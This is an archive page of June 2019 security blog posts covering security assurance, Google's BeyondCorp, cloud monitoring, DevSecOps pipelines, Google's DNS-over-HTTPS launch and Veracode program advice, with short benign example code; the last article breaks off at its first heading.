Monthly Archives: June 2019

Business-Focused Approach to Security Assurance Is More Evolution Than Revolution


According to a new research report from the Information Security Forum (ISF), only 32 percent of its members are satisfied with their security assurance programs, though 80 percent say they want to take a more business-focused approach to security. Given the ever-evolving threat landscape, security leaders understand that they always need their finger on the pulse of how secure their organization’s information is. That can be challenging if the right processes and controls are not in place across development, IT, and security in your organization.

Oftentimes, communicating the security of your organization – and communicating it well – comes down to asking the right people the right questions, and taking smaller steps to achieve the desired outcome. In the report, Establishing a Business-Focused Security Assurance Program, ISF proposes that organizations build on existing compliance-based approaches instead of reinventing the wheel. To map out where the program needs to go and begin evolving it with the business in mind, ISF notes that security leaders should:

  • Identify what business stakeholders want from security assurance
  • Break down the requirements into manageable tasks to move from current to future approaches
  • Apply a repeatable security assurance process across multiple target environments (e.g., business processes, projects, and supporting assets, where appropriate in your organization)

“Taking a business-focused approach to security assurance is an evolution. It means going a step further and demonstrating how well business processes, projects and supporting assets are really protected, by focusing on how effective controls are,” said Steve Durbin, Managing Director, ISF. “A business-focused approach requires a broader view, considering the needs of multiple stakeholders within the organization: what do they need to know, when and why? Answering these questions will enable adoption of testing, measurement and reporting techniques that provide appropriate evidence.”

Including Secure Coding in the Security Control Discussion

According to the 2019 Verizon Data Breach Investigations Report, 62 percent of breaches and 39 percent of incidents occur at the web application layer. While it is unclear exactly how the web applications were compromised in some cases, it’s assumed that attackers are scanning for specific web app vulnerabilities, exploiting them to gain access, inserting some kind of malware, and harvesting personal data to turn a profit.

An often-overlooked way to tighten security in your organization is to provide developers with the tools they need to code securely, and to continue learning about different vulnerabilities as they work. When development teams can scan for vulnerabilities in their code as they work, those flaws are less likely to be introduced into the QA and production stages. The State of Software Security Report Volume 9 shows that organizations conducting application security scanning more than 300 times per year shorten flaw persistence by a factor of 11.5.

This means that development leaders must be included in security control discussions. Their team may work in a different way than others across your organization, so understanding how to support them to make security a seamless priority in their day-to-day processes is a necessary step for security assurance. Once the DevSecOps approach to application development has been adopted, it’s even easier to verify for your executives – as well as customers and prospects – that you really do take security seriously.

The Right Analytics to Tell the Right Story

Analytics are useful for determining exactly which metrics AppSec managers should share with executives and the board. Given that policy compliance is often the top priority for this audience, AppSec managers need to set a clear threshold for the level of risk they are, and are not, willing to accept, based on the type of data involved.

The Veracode Platform includes Veracode Analytics, which empowers our customers to set up custom analytics once they’ve determined their risk threshold and application criticality. With an easy-to-use dashboard view, AppSec managers can review their AppSec program to make sure that development and security teams alike are scanning all of their applications – and fixing what they find.

The Veracode Platform and Veracode Analytics can be a game-changer for your business, helping you stay focused, motivate your teams, allocate resources more effectively, and communicate your security posture to the executive team more strategically.

For more on getting executive support for application security, see Everything You Need to Know About Getting AppSec Buy-In.

For more on measuring your application security program, see Everything You Need to Know About Measuring Your AppSec Program.

How Google adopted BeyondCorp


It's been almost five years since we released the first of multiple BeyondCorp papers, describing the motivation and design principles that eliminated network-based trust from our internal networks. With that anniversary looming and many organizations actively working to adopt models like BeyondCorp (which has also become known as Zero Trust in the industry), we thought it would be a good time to revisit topics we have previously explored in those papers, share the lessons that we have learned over the years, and describe where BeyondCorp is going as businesses move to the cloud.

This is the first post in a series that will focus on Google’s internal implementation of BeyondCorp, providing necessary context for how Google adopted BeyondCorp.

Why did we adopt BeyondCorp?

With a traditional enterprise perimeter security model, access to services and resources is provided by a device being connected to a privileged network. If an employee is in a corporate office, on the right network, services are directly accessible. If they're outside the office, at home or in a coffee shop, they frequently use a VPN to get access to services behind the enterprise firewall. This is the way most organizations protect themselves.

By 2011, it became clear to Google that this model was problematic, and we needed to rethink how enterprise services are accessed and protected for the following reasons:

Improving productivity
  • A growing number of employees were not in the office at all times. They were working from home, a coffee shop, a hotel or even on a bus or airplane. When they were outside the office, they needed to connect via a VPN, creating friction and extending the network perimeter.
  • The user experience of a VPN client may be acceptable, even if suboptimal, from a laptop. VPN use is less acceptable, from both the employee’s and the admin’s perspective, given the growing use of devices such as smartphones and tablets to perform work.
  • A number of users were contractors or other partners who only needed selective access to some of our internal resources, even though they were working in the office.
Keeping Google secure
  • The expanded use of public clouds and software-as-a-service (SaaS) apps meant that some of our corporate services were no longer deployed on-premises, further blurring the traditional perimeter and trust domain. This introduced new attack vectors that needed to be protected against.
  • There was ongoing concern about relying solely on perimeter defense, especially when the perimeter was growing consistently. With the proliferation of laptops and mobile devices, vulnerable and compromised devices were regularly brought within the perimeter.
  • Finally, if a vulnerability was observed or an attack did happen, we wanted the ability to respond as quickly and automatically as possible.

How did we do it?

In order to address these challenges, we implemented a new approach that we called BeyondCorp. Our mission was to have every Google employee work successfully from untrusted networks on a variety of devices without using a client-side VPN. BeyondCorp has three core principles:
  • Connecting from a particular network does not determine which service you can access.
  • Access to services is granted based on what the infrastructure knows about you and your device.
  • All access to services must be authenticated, authorized and encrypted for every request (not just the initial access).
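To make these principles concrete, here is a minimal, purely illustrative sketch of a per-request access decision in Python. It is not Google's implementation; the user and device attributes, trust tiers, and service requirements are all hypothetical, and the point is simply that network location never appears as an input.

```python
from dataclasses import dataclass

@dataclass
class Device:
    is_managed: bool          # inventory says we own and manage this device
    disk_encrypted: bool
    os_patch_level_ok: bool

@dataclass
class User:
    identity_verified: bool   # strong authentication succeeded
    groups: set

def device_trust_tier(device: Device) -> str:
    """Derive a coarse trust tier from device posture, not from network location."""
    if device.is_managed and device.disk_encrypted and device.os_patch_level_ok:
        return "high"
    if device.is_managed:
        return "medium"
    return "low"

def authorize(user: User, device: Device, service_required_tier: str,
              service_required_group: str) -> bool:
    """Every request is evaluated; the client network never appears as an input."""
    tiers = ["low", "medium", "high"]
    return (
        user.identity_verified
        and service_required_group in user.groups
        and tiers.index(device_trust_tier(device)) >= tiers.index(service_required_tier)
    )

# Example: a verified user on an unmanaged laptop is denied a high-tier service.
print(authorize(User(True, {"eng"}), Device(False, True, True), "high", "eng"))  # False
```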


High level architecture for BeyondCorp

BeyondCorp gave us the security that we were looking for along with the user experience that made our employees more productive inside and outside the office.

What lessons did we learn?

Given this was uncharted territory at the time, we had to learn quickly and adapt when we encountered surprises. Here are some key lessons we learned.

Obtain executive support early on and keep it

Moving to BeyondCorp is not a quick, painless exercise. It took us several years just to get most of the basics in place, and to this day we are still continuing to improve and refine our implementation. Before embarking on this journey to implement BeyondCorp, we got buy-in from leadership very early in the project. With a mandate, you can ask for support from lots of different groups along the way.

We make a point to re-validate this buy-in on an ongoing basis, ensuring that the business still understands and values this important shift.

Recognize data quality challenges from the very beginning

Access decisions depend on the quality of your input data. More specifically, they depend on trust analysis, which requires a combination of employee and device data.

If this data is unreliable, the result will be incorrect access decisions, suboptimal user experiences and, in the worst case, an increase in system vulnerability, so the stakes are definitely high.

We put in a lot of work to make sure our data is clean and reliable before making any impactful changes, and we have both workflows and technical measures in place to ensure data quality remains high going forward.

Enable painless migration and usage

The migration should be a zero-touch or invisible experience for your employees, making it easy for them to continue working without interruptions or added steps. If you make it difficult for your employees to migrate or maintain productivity, they might feel frustrated by the process. Complex environments are difficult to fully migrate with initial solutions, so be prepared to review, grant and manage exceptions at least in the early stages. With this in mind, start small, migrate a small number of resources, apps, users and devices, and only increase coverage after confirming the solution is reliable.

Assign employee and helpdesk advocates

We also had employee and helpdesk advocates on the team who represented the user experience from those perspectives. This helped us architect our implementation in a way that avoided putting excess burden on employees or technical support staff.

Clear employee communications

Communicating clearly with employees so that they know what is happening is very important. We sent our employees, partners, and company leaders regular communications whenever we made important changes, ensuring motivations were well understood and there was a window for feedback and iteration prior to enforcement changes.

Run highly reliable systems

Since every request goes through the core BeyondCorp infrastructure, we needed a global, highly reliable and resilient set of services. If these services are degraded, employee productivity suffers.

We used Site Reliability Engineering (SRE) principles to run our BeyondCorp services.

Next time

In the next post in this series, we will go deeper into when you should trust a device, what data you should use to determine whether or not a device should be trusted, and what we have learned by going through that process.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

This post was updated on July 3 to include Justin McWilliams as an author.

Top 3 Challenges with Securing the Cloud

By 2020, it’s predicted that 83% of company workloads will be stored in the cloud (Forbes). This rise in usage and popularity comes as no surprise given how cost-effective and easy it is to manage systems in the cloud.

As more critical applications migrate to the cloud, data privacy and software security are becoming a greater concern. With cloud-based email servers involved in 60% of web application compromises (Verizon 2019 DBIR), it’s time to take these concerns seriously.

The cloud has had its share of attacks over the years, from DDoS to data loss and data breaches. Whether through malicious tampering or accidental deletion, these incidents can lead to a loss of sensitive data and often a loss of revenue.

How exactly do we secure data in the cloud and protect against these attacks?

The one way to truly secure your data in the cloud is through continual monitoring of your cloud systems. However, this is a challenging process for several reasons:

1.    Lack of Visibility

Cloud technology solutions often make the job of security providers more difficult because they don’t provide a single pane of glass for viewing all endpoints and data. For this reason, you need a wide range of tools to monitor your cloud systems. For example, most cloud solutions send email notifications that provide some visibility into your environment. However, these notifications don’t always provide enough insight into what exactly happened. You may receive an email alert about a suspicious login, but many of these alerts don’t say where the login attempt happened or which user was affected.

These vague alerts mean you have to investigate further; however, many of these cloud systems don’t have very useful investigative tools. If you want to find out more about the alert, you may be able to view the reports and read the logs associated with the activity, but that requires practice in knowing what to look for and how to interpret the information. This leads to another challenge in cloud security: lack of expertise.

2.    Lack of Expertise

It takes practice to be able to look at security logs and interpret what the activity means. Different cloud providers may produce different types of logs and it can be difficult to translate the many varying log types.
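As a small illustration of the problem, the sketch below normalizes two invented provider log formats into a single schema so that sign-in events can be reviewed consistently. The field names are hypothetical and do not correspond to any vendor's actual log format.

```python
from datetime import datetime, timezone

def normalize_provider_a(event: dict) -> dict:
    # Hypothetical "provider A" format: epoch seconds, nested actor object.
    return {
        "time": datetime.fromtimestamp(event["ts"], tz=timezone.utc).isoformat(),
        "user": event["actor"]["email"],
        "action": event["eventName"],
        "source_ip": event.get("sourceIp", "unknown"),
    }

def normalize_provider_b(event: dict) -> dict:
    # Hypothetical "provider B" format: ISO timestamp, flat fields.
    return {
        "time": event["timestamp"],
        "user": event["userPrincipalName"],
        "action": event["operation"],
        "source_ip": event.get("clientIP", "unknown"),
    }

raw_events = [
    ("a", {"ts": 1561000000, "actor": {"email": "alice@example.com"},
           "eventName": "ConsoleLogin", "sourceIp": "203.0.113.7"}),
    ("b", {"timestamp": "2019-06-20T04:00:00Z", "userPrincipalName": "bob@example.com",
           "operation": "UserLoggedIn"}),
]

normalizers = {"a": normalize_provider_a, "b": normalize_provider_b}
for provider, event in raw_events:
    print(normalizers[provider](event))
```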

If you want to secure your cloud environment properly, you will need a team dedicated to configuring, monitoring, and managing these tools. Through 2022, it’s predicted that 95% of cloud security failures will result from customer error (Gartner). This reinforces the need to configure your cloud environment properly. Interpreting logs and configuring cloud systems requires skills that are developed over time. Many security professionals lack this particular expertise or the time required to properly develop these skills.

Those that do possess these skills and knowledge are in high demand, and there simply aren’t enough people to fill these positions.

3.    Lack of Resources

Implementing all the right tools and staffing appropriately to monitor these tools around-the-clock is not an inexpensive endeavor.  Luckily, there are services you can leverage to augment your staff and monitor your environment, such as a managed security services provider (MSSP).

MSSPs have the tools and resources to pull information from all of your different cloud systems and monitor them in one place.  With a full staff of experts on-hand at all hours, an MSSP is fully prepared to monitor and respond to incidents. They can help provide the expertise and visibility into your cloud environment required to properly secure your cloud systems.


Live from AWS re:Inforce: Learnings from Security Enablement for DevOps at AT&T


This week, AWS ran its inaugural security conference, AWS re:Inforce, in Boston. There were several interesting talks at the conference, and I found that John Maski’s presentation, “Integrating AppSec in your DevSecOps on AWS,” contained great practical advice. Maski worked at AT&T for 32 years, most recently as Director, Production Resiliency & DevSecOps Enablement. He recently joined Veracode to advise customers on how to best integrate Veracode into their security pipelines, and we’re lucky to have him on the team.

Support from Executive Leadership is Crucial

Starting out, and as expected for any large organization, Maski found a huge variety of skill levels and a lot of variation in how people ran their development pipelines outside of the central DevOps initiative.  Software development was optimized for speed – aka “quantity” – and security was an afterthought. 

On the upside, Maski saw pockets of advanced knowledge and CI/CD implementations. A significant CI/CD platform was already in the works. Most importantly, there was a huge appetite among executives for making quick and extensive progress.

“In an organization the size of AT&T, you can’t make meaningful progress without the support of executive leadership,” Maski said. “It is absolutely critical to drive the necessary cultural changes.”

With this backing, he set out to connect with partner organizations, working collectively towards the seemingly impossible goal to secure AT&T’s entire application landscape. Spoiler alert: When Maski recently left AT&T, they were very close to completing this goal.

Integrating Security into the CI/CD Pipeline

If you are coming from the security side of the house and are in charge of application security, it really pays off to truly understand your organization’s development tools and how pipelines are set up. Not only will you be able to speak your engineering team’s language, you will be better suited to advise them on how to integrate security testing solutions.

Most application security testing can and should be automated, with the exception of what’s at the very beginning and the very end of the process. Threat modeling is still a manual process that relies on human understanding of the architecture, even if there are tools that help visualize and document it. Likewise, penetration testing is a final litmus test at the end of the development process that should be carried out on any critical application before it is deployed into production.

In the middle are various automated testing solutions that should be run automatically to regularly provide feedback on security defects. Static analysis tests the application code for a broad range of security flaws, and it can be fully automated into both the IDE and the CI process. In the IDE, it provides early security guidance and education to software engineers while they are coding by highlighting potential vulnerabilities and suggesting best practices. Veracode has found that integrating SAST in this early stage in the process has helped organizations to reduce newly introduced flaws by 60 percent.

However, guidance at this stage is not mandatory and is mostly suitable to removing flaws in newly written code. To ensure a more structured feedback and compliance process, static analysis should be integrated into the SDLC. Typically, development teams would scan as part of their CI process, either on a code commit or a pull request, and get security defects flagged through the ticketing system. They will do this scan in a “sandbox,” so that results do not get escalated to the security team. Finally, for high security applications, we recommend doing a scan on the full scope of the application before each deployment to ensure that no security defects escape to production.
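To make the CI integration concrete, here is a rough sketch of a pipeline gate that uploads a build artifact to a generic scanning service and fails the build when high-severity findings are present. The endpoint, parameters, and response fields are hypothetical placeholders, not the Veracode API, and a real pipeline would also poll for scan completion before fetching results.

```python
import os
import sys
import requests  # third-party: pip install requests

SCAN_API = "https://scanner.example.com/api/v1"   # hypothetical endpoint
TOKEN = os.environ["SCAN_API_TOKEN"]
HEADERS = {"Authorization": f"Bearer {TOKEN}"}

def submit_scan(artifact_path: str, app_id: str) -> str:
    """Upload the build artifact for static analysis and return a scan id."""
    with open(artifact_path, "rb") as f:
        resp = requests.post(f"{SCAN_API}/apps/{app_id}/scans",
                             headers=HEADERS, files={"artifact": f})
    resp.raise_for_status()
    return resp.json()["scan_id"]

def high_severity_count(app_id: str, scan_id: str) -> int:
    # (A real pipeline would poll until the scan completes before calling this.)
    resp = requests.get(f"{SCAN_API}/apps/{app_id}/scans/{scan_id}/findings",
                        headers=HEADERS, params={"severity": "high,very_high"})
    resp.raise_for_status()
    return len(resp.json()["findings"])

if __name__ == "__main__":
    scan_id = submit_scan("build/app.jar", app_id="payments-portal")
    findings = high_severity_count("payments-portal", scan_id)
    if findings > 0:
        print(f"Failing build: {findings} high-severity flaws found")
        sys.exit(1)   # non-zero exit fails the CI stage
    print("No high-severity flaws; proceeding to deploy stage")
```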

Software composition analysis looks at known vulnerabilities in open source libraries that are being used in the code. If you find such a vulnerability, the fix is usually upgrading to a different library version rather than fixing the open source code yourself. SCA often integrates with the SDLC in the same places as static analysis.
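The core idea behind SCA can be illustrated in a few lines: compare the dependency versions in your build against an advisory list and report the upgrade that clears each finding. The packages, versions, and advisories below are made up for the example.

```python
# Hypothetical advisories: (package, vulnerable_below, fixed_in)
ADVISORIES = [
    ("acme-xml", "2.4.0", "2.4.0"),
    ("fastjsonlib", "1.9.3", "1.9.3"),
]

def parse_version(v: str) -> tuple:
    return tuple(int(part) for part in v.split("."))

def check_dependencies(deps: dict) -> list:
    """Return (package, current, fixed_in) for every dependency with a known issue."""
    findings = []
    for package, vulnerable_below, fixed_in in ADVISORIES:
        current = deps.get(package)
        if current and parse_version(current) < parse_version(vulnerable_below):
            findings.append((package, current, fixed_in))
    return findings

# Example dependency manifest pulled from a build file (hypothetical).
deps = {"acme-xml": "2.1.7", "fastjsonlib": "1.9.3", "left-padder": "0.0.9"}
for package, current, fixed_in in check_dependencies(deps):
    print(f"{package} {current} has a known vulnerability; upgrade to {fixed_in}")
```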

Dynamic analysis is a third way of looking for vulnerabilities in software and is typically applied to web applications. Unlike static analysis, which looks at the application code, dynamic analysis interacts with the running application via an instrumented browser that crawls and audits it. While findings overlap with other testing solutions, there are several security issues that only dynamic analysis can detect, including server configuration errors. Dynamic analysis is typically run in the QA stage against a staging server and against the production server.
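As a tiny taste of what runtime testing can see that code analysis cannot, the sketch below requests a running site and flags missing security response headers, one small slice of the server configuration issues a dynamic scanner checks. The target URL is a placeholder.

```python
import requests  # third-party: pip install requests

EXPECTED_HEADERS = ["Strict-Transport-Security", "Content-Security-Policy",
                    "X-Content-Type-Options"]

def check_security_headers(url: str) -> list:
    """Return the security headers the running server fails to send."""
    resp = requests.get(url, timeout=10)
    return [h for h in EXPECTED_HEADERS if h not in resp.headers]

missing = check_security_headers("https://staging.example.com")
if missing:
    print("Missing security headers:", ", ".join(missing))
else:
    print("All expected security headers present")
```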

Five Tips for Getting Traction with Your DevSecOps Initiative

With many lessons learned during his DevSecOps initiative at AT&T, Maski shared his five recommendations to get traction with your own program:

  1. Partner with stakeholders: Identify, collaborate, and align with your partners, especially in software development. You have to understand their world and respect their point of view for your program to be successful.
  2. Pick the right metrics: Know your metrics before you jumpstart the program. Talk upfront with your sponsors and partners on what success means to them and agree on metrics.
  3. Don’t boil the ocean: Go “Agile.” Pick pilot applications to secure, so that you can learn from the process and expand to the next group of applications. Keep note of what you learn along the way to improve the program over time.
  4. Run an internal campaign: Communicate effectively to raise awareness about the importance of AppSec to the business. Tie AppSec to the mission of the company. Use your communication to educate DevOps team members about AppSec to help strengthen their expertise.
  5. Demonstrate progress: To ensure continued executive support for your program, regularly report your program’s progress through the metrics you picked. Tailor your progress reports to the audience; for example, your senior leadership will want to see different metrics than your engineering partners.

Key Learnings from AT&T’s DevSecOps Program

Maski left the audience with three key learnings from running his program:

  • Strong Executive Leadership is key to driving the necessary cultural changes – and to secure the required budget.
  • If getting your program started quickly is a requirement, use services built on a robust platform. That way you can focus on onboarding applications rather than building and maintaining scanning infrastructure.
  • Build a strong team and have a flexible plan. Map out and communicate your plan with confidence. That doesn’t mean that your plan has to be perfect – learn and adjust as you go along. Set bold goals to drive progress.

Veracode was and is a cornerstone of AT&T’s AppSec strategy. If you’d like to learn how to build an AppSec program in your organization, download The Ultimate Guide to Getting Started With Application Security.

Google Public DNS over HTTPS (DoH) supports RFC 8484 standard



Ever since we launched Google Public DNS in 2009, our priority has been the security of DNS resolution. In 2016, we launched a unique and innovative experimental service – DNS over HTTPS, now known as DoH. Today we are announcing general availability for our standard DoH service. Now our users can resolve DNS using DoH at the dns.google domain with the same anycast addresses (like 8.8.8.8) as regular DNS service, with lower latency from our edge PoPs throughout the world.

General availability of DoH includes full RFC 8484 support at a new URL path, and continued support for the JSON API launched in 2016. The new endpoints are:

  • https://dns.google/dns-query (RFC 8484 – GET and POST)
  • https://dns.google/resolve (JSON API – GET)
We are deprecating internet-draft DoH support on the /experimental URL path and DoH service from dns.google.com, and will turn down support for them in a few months.

With Google Public DNS, we’re committed to providing fast, private, and secure DNS resolution through both DoH and DNS over TLS (DoT). We plan to support the JSON API until there is a comparable standard for webapp-friendly DoH.
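For example, a single HTTPS GET against the JSON API resolves a name and returns the answer as JSON. The snippet below uses the documented name and type parameters; the requests dependency and the error handling are our own additions.

```python
import requests  # third-party: pip install requests

def doh_json_lookup(name: str, record_type: str = "A") -> list:
    """Resolve a name via the Google Public DNS JSON API over HTTPS."""
    resp = requests.get(
        "https://dns.google/resolve",
        params={"name": name, "type": record_type},
        timeout=5,
    )
    resp.raise_for_status()
    body = resp.json()
    if body.get("Status") != 0:          # 0 = NOERROR in DNS RCODE terms
        raise RuntimeError(f"DNS error, RCODE {body.get('Status')}")
    return [answer["data"] for answer in body.get("Answer", [])]

print(doh_json_lookup("dns.google", "A"))
```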


What the new DoH service means for developers

To use our DoH service, developers should configure their applications to use the new DoH endpoints and properly handle HTTP 4xx error and 3xx redirection status codes.
  • Applications should use dns.google instead of dns.google.com. Applications can query dns.google at well-known Google Public DNS addresses, without needing an extra DNS lookup.
  • Developers using the older /experimental internet-draft DoH API need to switch to the new /dns-query URL path and confirm full RFC 8484 compliance. The older API accepts queries using features from early drafts of the DoH standard that are rejected by the new API.
  • Developers using the JSON API have two new GET parameters available for DNS/DoH proxies or DNSSEC-aware applications.
Redirection of /experimental and dns.google.com

The /experimental API will be turned down in 30 days and HTTP requests for it will get an HTTP redirect to an equivalent https://dns.google/dns-query URI. Developers should make sure DoH applications handle HTTP redirects by retrying at the URI specified in the Location header.
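For the RFC 8484 endpoint, the request body is a binary DNS message. The sketch below hand-builds a minimal wire-format query, POSTs it with the application/dns-message content type, and retries at the Location header on a 3xx response, as described above. It is a bare-bones illustration, not a full DNS client, and it does not parse the response.

```python
import struct
import requests  # third-party: pip install requests

def build_query(name: str, qtype: int = 1) -> bytes:
    """Minimal DNS wire-format query: header + one question (qtype 1 = A, class IN)."""
    header = struct.pack(">HHHHHH", 0, 0x0100, 1, 0, 0, 0)  # ID 0, RD flag, QDCOUNT 1
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", qtype, 1)

def doh_post(url: str, query: bytes, max_redirects: int = 3) -> bytes:
    """POST the query; on a 3xx response, retry at the Location header."""
    headers = {"Content-Type": "application/dns-message",
               "Accept": "application/dns-message"}
    for _ in range(max_redirects + 1):
        resp = requests.post(url, data=query, headers=headers,
                             allow_redirects=False, timeout=5)
        if resp.status_code in (301, 302, 307, 308):
            url = resp.headers["Location"]   # a real client would resolve relative URLs
            continue
        resp.raise_for_status()
        return resp.content                  # raw DNS response message
    raise RuntimeError("Too many redirects")

answer = doh_post("https://dns.google/dns-query", build_query("example.com"))
print(f"Received {len(answer)} bytes of DNS response")
```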

Turning down the dns.google.com domain will take place in three stages.
  1. The first stage (in 45 days) will update the dns.google.com domain name to return 8.8.8.8 and other Google Public DNS anycast addresses, but continue to return DNS responses to queries sent to former addresses of dns.google.com. This will provide a transparent transition for most clients.
  2. The second stage (in 90 days) will return HTTP redirects to dns.google for queries sent to former addresses of dns.google.com.
  3. The final stage (in 12 months) will send HTTP redirects to dns.google for any queries sent to the anycast addresses using the dns.google.com domain.
We will post timelines for redirections on the public-dns-announce forum and on the DoH migration page. You can find further technical details in our DoH documentation, and if you have a question or problem with our DoH service, you can create an issue on our tracker or ask on our discussion group. As always, please provide as much information as possible to help us investigate the problem!

Key Components to Consider When Kicking Off Your Veracode AppSec Program

I’ve been working as a Veracode security program manager since 2013, and in those six years I’ve adopted the AppSec best practices that contribute to successful AppSec programs. I started my journey here as a program manager and was fortunate enough to manage and lead some of Veracode’s largest and most complex customer programs. Today, I’m managing a team of program managers.

In this blog, I will walk through four key components to consider when kicking off your program with Veracode. These are all components I’ve implemented when managing large programs, and they have helped organizations understand what’s needed for a successful, well-functioning application security program.

Customer Engagement

The first component is Veracode customer engagement. You might be thinking, “of course, this is a given,” but in some cases I’ve seen (more so in the past), it’s not. The No. 1 roadblock for the customers I’ve seen struggle has been lack of engagement. An established security team (on the client side) that can act as the liaison between the development organization and Veracode is very important. In some cases, and increasingly so with the DevSecOps push, dev management is involved as well.

When I first began my journey with Veracode, security teams didn’t exist at many organizations, so an engaged team also didn’t exist. Today, when I go on-site and meet with my customers, I frequently thank them. I thank them for their dedication and engagement, because without primary, day-to-day contacts, it would be much more difficult to get the necessary traction. At Veracode, we say it’s a team effort. Identifying a team that is willing and eager to work with its Veracode contacts is the No. 1 step toward success. This team (or individual) can also act as a Veracode advocate, work with the Veracode SPM to tackle Veracode initiatives, and be an internal presence that helps drive and motivate, making security the top priority so that our clients’ customers are confident they’re using secure products and applications.

Cross-Functional Communication

Second on my list is cross-functional communication. It is imperative for a program to have cross-functional communication between the security team and the main teams involved, including executives and the development organization. Communicating policy mandates, remediation plans, and automation plans across all functions, including developers and DevOps teams, early in the program will put a program ahead. Think through the best method for circulating important plans across teams, whether email or a newsletter, and who should deliver them. Veracode Program Management acts as an extension of our customers’ teams and, therefore, can help with messaging and delivery.

Ultimately, communication will prevent confusion and promote awareness, which is important to the health of a program. When a developer is introduced to security scanning requirements or remediation plans later in the development lifecycle, it can affect release dates. The team will be in a much better position if they know early on what they’re responsible for and when, and any consequences if they do not incorporate security into their SDLC.

Application Inventory

Next is application inventory, another major component. This can be a list of your organization’s high-risk applications, those most critical to the business that could damage company brand or reputation if breached, or it can cover all applications in the organization. If you do not have this information early on, it can cause delays when kicking off a program.

We recommend companies scan all their applications. However, many organizations start their programs with a baseline of only their high-risk applications. If you fall into this category, having that list ready and sharing it with your Veracode Security Program Manager will keep everyone in alignment. Your SPM will provide a list of the important information needed when gathering application inventory information, and prior to setting up application profiles in the Veracode platform.

Program Strategy

Finally, once you’ve identified your team, have a communication plan in place, and have created an application inventory, the next step is to map out program strategy. This is where your Veracode SPM will have a discovery session with you and your team to discuss the future of the program and obtain key information to ensure success. He or she will also review the critical activities that need to take place in the security program to keep it on track. Additionally, the SPM will review measurable metrics with you and discuss which metrics are key to the organization and its teams in order to track program success down the road. The SPM will handle the operational effort to get you there and report back regularly to ensure that you are achieving your organizational goals through those metrics.

The SPM will ask several questions to help develop and kick off your program, including:

  • Details about your SDLC environment, development tools, and systems the development teams are using. This is imperative as the push to shift left and toward DevSecOps is a major focus for many organizations today. The end goal is to fully automate your application security program, because automating and integrating security into your CI/CD pipeline will make for a seamless program that will save you and your developers time and money.
  • Identifying development teams and setting onboarding schedules. Training users on how to use the Veracode platform will help immensely with developer adoption and awareness. Veracode provides training and always offers flexible schedules to accommodate developers globally.
  • Establishing a remediation process and workflow. The end goal is to bring down those very high and high flaws to get you closer to being compliant with your organization’s policies and standards.

Lastly, we will have discussions around automation and integration into your CI/CD pipeline. As mentioned, this will save time for developers by streamlining the scanning process through automation and having them consume Veracode scan results in their environment, rather than manually running scans and reviewing results in the UI.

Whether you’re an existing customer or a potential customer, if all of these items are checked off at the beginning, you will be on the right path to kick-starting a robust application security program that everyone at your organization will be on board with.

Learn More

Get more details on maturing your application security program in our guide, Everything You Need to Know About Maturing Your Application Security Program.

And you can always get valuable tips and advice on managing AppSec from other Veracode customers in our Community.

Veracode to showcase DevSecOps solutions at inaugural AWS re:Inforce

Developers and security professionals from around the world are descending on Boston this week to attend the first AWS security conference, re:Inforce, for what promises to be one of the most exciting events in recent memory in the industry.

As a pioneer of application security that is helping educate both security and dev teams in building more secure code, Veracode is proud to be a platinum sponsor of AWS re:Inforce here in Boston, a world-renowned hub of cybersecurity innovation.

With so many security conferences taking place around the world throughout the year, and with more companies entering the market and crowding niches, choosing where to focus can be dizzying for companies buying security solutions.

What makes AWS re:Inforce different?

Companies seeking to change the world are using software to push entire industries forward with new advancements, better insights and greater efficiencies. At the same time, new threat vectors appear, and new languages and frameworks change how we create software, causing cyberattacks to evolve and become more sophisticated. The security of software is just as critical as the function of the software itself. But, if the software you are developing or buying is insecure, you can’t achieve your vision – no matter how important or innovative it is.

Two movements that are allowing innovation and security to evolve in harmony – the shift to cloud-native solutions and the evolution of DevSecOps – will be on full display at AWS re:Inforce. That’s because we’ve moved from a world where applications were only run in the cloud to one where they are written and live in the cloud throughout their lifecycle. As a result, we are experiencing a dramatic increase in scan frequency and our customers are adopting application security practices earlier in their continuous integration pipeline. More frequent, incremental scans in the SDLC – a pillar of DevSecOps – allow companies to fix flaws more than 11 times more quickly than the typical organization. Fundamentally, when a company’s applications are more secure and their development teams are not slowed down by security, they achieve a competitive advantage.

Veracode is evolving its SaaS architecture by leveraging the power of AWS to better meet increased demand for DevSecOps practices from customers. Development teams are looking for fast, accurate application security tools integrated directly into their CI/CD work cycles. Veracode processes an average of more than 400,000 scans per month for customers around the world, and companies expect fast scan times and the ability to rapidly scale their volume of scanning given that developers scan at every code check-in. Veracode’s combination of technology, expertise, and services backed by AWS cloud services helps organizations more effectively find and fix the vulnerabilities in their software.

Veracode has also achieved Advanced Technology Partner Status in the AWS Partner Network (APN). This achievement is the highest tier within the AWS Partner Network. It recognizes a rigorous qualification process that includes AWS technical certification and validation with a wide range of customer references. The technical certification included an extensive review of the Veracode architecture leveraging AWS services against AWS published best practices and benchmarks for security, scalability and availability.

At AWS re:Inforce, attendees can visit the Veracode booth (#813) to learn more about the company’s application security testing platform, get a Veracode t-shirt and participate in an interactive experience designed to test developers’ secure programming knowledge.

On the evening of Tuesday, June 25, Veracode is hosting a “Conquer the Cloud” afterparty at City Tap House in Boston. Securing the cloud takes a tribe of AppSec heroes, and we’d love your tribe to meet ours over beers, games, and live music during AWS re:Inforce. Take a moment to register here.

Finally, don’t miss a presentation at re:Inforce by John Maski, Veracode Application Security Consultant and former director of DevSecOps at AT&T, titled “Integrating AppSec Into Your DevSecOps on AWS.” John will describe securing CI/CD pipelines in enterprise environments and “shifting left” with security. This talk is taking place at 10:15 am, Wed., June 26 in the Solutions Theater.

How can UK Financial Services Organisations Combat the Cyber Threat?

Guest article by Genevra Champion, Sector Marketing Manager at IT Governance

The financial services industry is naturally a lucrative target for cyber criminals. Financial organisations trade and control vast amounts of money, as well as collect and store customers’ personal information, so a data breach could clearly be disastrous for an industry that is built on trust with its customers.

The financial services industry is second only to retail in terms of the industries most affected by cyber crime – the number of breaches reported by UK financial services firms to the FCA increased 480 per cent in 2018, compared to the previous year. While financial services organisations are heavily regulated and cybersecurity is becoming more of a business priority, there is still much more to be accomplished when it comes to businesses understanding what measures must be taken – from the C-suite down – to effectively protect organisations against inevitable breaches.

So how can financial services firms proactively equip themselves to respond to increased regulatory scrutiny and mitigate the impact from the growing number of threats they will face?

Mitigating the Cyber Threat
